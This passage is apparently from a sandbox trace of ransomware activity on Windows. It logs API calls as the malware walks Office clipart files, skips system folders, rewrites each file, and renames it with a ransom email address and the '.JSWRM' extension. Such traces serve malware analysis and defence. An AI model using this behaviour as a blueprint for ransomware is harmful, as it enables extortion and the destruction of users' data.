lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.880] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0092.880] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00555_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00555_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.881] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5132) returned 1 [0092.882] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.882] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1400) returned 0x205850 [0092.882] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1400, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1400, lpOverlapped=0x0) returned 1 [0092.884] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.884] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1400, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1400, lpOverlapped=0x0) returned 1 [0092.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0092.884] CloseHandle (hObject=0x314) returned 1 [0092.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0092.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0092.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0092.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0092.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0092.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0092.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0092.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0092.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.884] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00555_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00555_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00555_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00555_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0092.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0092.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0092.889] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10149fbd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10149fbd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10170232, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x26b0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE00559_.WMF", cAlternateFileName="")) returned 1 [0092.889] lstrcmpiW (lpString1="PE00559_.WMF", lpString2=".") returned 1 [0092.889] lstrcmpiW (lpString1="PE00559_.WMF", lpString2="..") returned 1 [0092.889] lstrcmpiW (lpString1="PE00559_.WMF", lpString2="...") returned 1 [0092.889] lstrcmpiW (lpString1="PE00559_.WMF", lpString2="windows") returned -1 [0092.889] lstrcmpiW (lpString1="PE00559_.WMF", lpString2="recovery") returned -1 [0092.889] lstrcmpiW (lpString1="PE00559_.WMF", lpString2="perflogs") returned -1 [0092.889] lstrcmpiW (lpString1="PE00559_.WMF", lpString2="documents and settings") returned 1 [0092.889] lstrcmpiW (lpString1="PE00559_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.889] lstrcmpiW (lpString1="PE00559_.WMF", lpString2="system volume information") returned -1 [0092.889] lstrcmpiW (lpString1="PE00559_.WMF", lpString2="msocache") returned 1 [0092.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0092.889] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00559_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.889] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00559_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00559_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0092.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0092.889] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00559_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.889] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00559_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00559_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0092.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0092.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0092.889] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.889] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0092.889] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00559_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00559_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.890] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9904) returned 1 [0092.890] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.890] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x26b0) returned 0x24d210 [0092.891] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x26b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x26b0, lpOverlapped=0x0) returned 1 [0092.893] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.893] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x26b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x26b0, lpOverlapped=0x0) returned 1 [0092.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0092.893] CloseHandle (hObject=0x314) returned 1 [0092.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0092.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0092.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0092.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0092.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0092.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0092.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0092.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0092.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.894] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00559_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00559_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00559_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00559_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0092.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0092.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0092.895] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10123d5b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10123d5b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10123d5b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5670, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE00563_.WMF", cAlternateFileName="")) returned 1 [0092.895] lstrcmpiW (lpString1="PE00563_.WMF", lpString2=".") returned 1 [0092.895] lstrcmpiW (lpString1="PE00563_.WMF", lpString2="..") returned 1 [0092.895] lstrcmpiW (lpString1="PE00563_.WMF", lpString2="...") returned 1 [0092.895] lstrcmpiW (lpString1="PE00563_.WMF", lpString2="windows") returned -1 [0092.895] lstrcmpiW (lpString1="PE00563_.WMF", lpString2="recovery") returned -1 [0092.895] lstrcmpiW (lpString1="PE00563_.WMF", lpString2="perflogs") returned -1 [0092.895] lstrcmpiW (lpString1="PE00563_.WMF", lpString2="documents and settings") returned 1 [0092.895] lstrcmpiW (lpString1="PE00563_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.895] lstrcmpiW (lpString1="PE00563_.WMF", lpString2="system volume information") returned -1 [0092.895] lstrcmpiW (lpString1="PE00563_.WMF", lpString2="msocache") returned 1 [0092.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0092.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00563_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00563_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00563_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0092.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0092.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00563_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00563_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00563_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0092.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0092.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0092.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0092.895] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00563_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00563_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.896] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=22128) returned 1 [0092.896] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5670) returned 0x24d210 [0092.896] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x5670, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x5670, lpOverlapped=0x0) returned 1 [0092.899] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.899] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x5670, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x5670, lpOverlapped=0x0) returned 1 [0092.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0092.900] CloseHandle (hObject=0x314) returned 1 [0092.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0092.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0092.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0092.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0092.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0092.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0092.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0092.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0092.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0092.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0092.900] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00563_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00563_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00563_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00563_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0092.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0092.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0092.901] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10123d5b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10123d5b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10123d5b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1ae6, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE00578_.WMF", cAlternateFileName="")) returned 1 [0092.901] lstrcmpiW (lpString1="PE00578_.WMF", lpString2=".") returned 1 [0092.901] lstrcmpiW (lpString1="PE00578_.WMF", lpString2="..") returned 1 [0092.901] lstrcmpiW (lpString1="PE00578_.WMF", lpString2="...") returned 1 [0092.901] lstrcmpiW (lpString1="PE00578_.WMF", lpString2="windows") returned -1 [0092.901] lstrcmpiW (lpString1="PE00578_.WMF", lpString2="recovery") returned -1 [0092.901] lstrcmpiW (lpString1="PE00578_.WMF", lpString2="perflogs") returned -1 [0092.901] lstrcmpiW (lpString1="PE00578_.WMF", lpString2="documents and settings") returned 1 [0092.901] lstrcmpiW (lpString1="PE00578_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.901] lstrcmpiW (lpString1="PE00578_.WMF", lpString2="system volume information") returned -1 [0092.901] lstrcmpiW (lpString1="PE00578_.WMF", lpString2="msocache") returned 1 [0092.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0092.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00578_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00578_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00578_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0092.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0092.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00578_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00578_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00578_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0092.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0092.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0092.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0092.902] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00578_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00578_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.902] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6886) returned 1 [0092.902] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1ae0) returned 0x205850 [0092.902] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1ae0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1ae0, lpOverlapped=0x0) returned 1 [0092.908] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.908] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1ae0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1ae0, lpOverlapped=0x0) returned 1 [0092.908] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0092.908] CloseHandle (hObject=0x314) returned 1 [0092.908] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 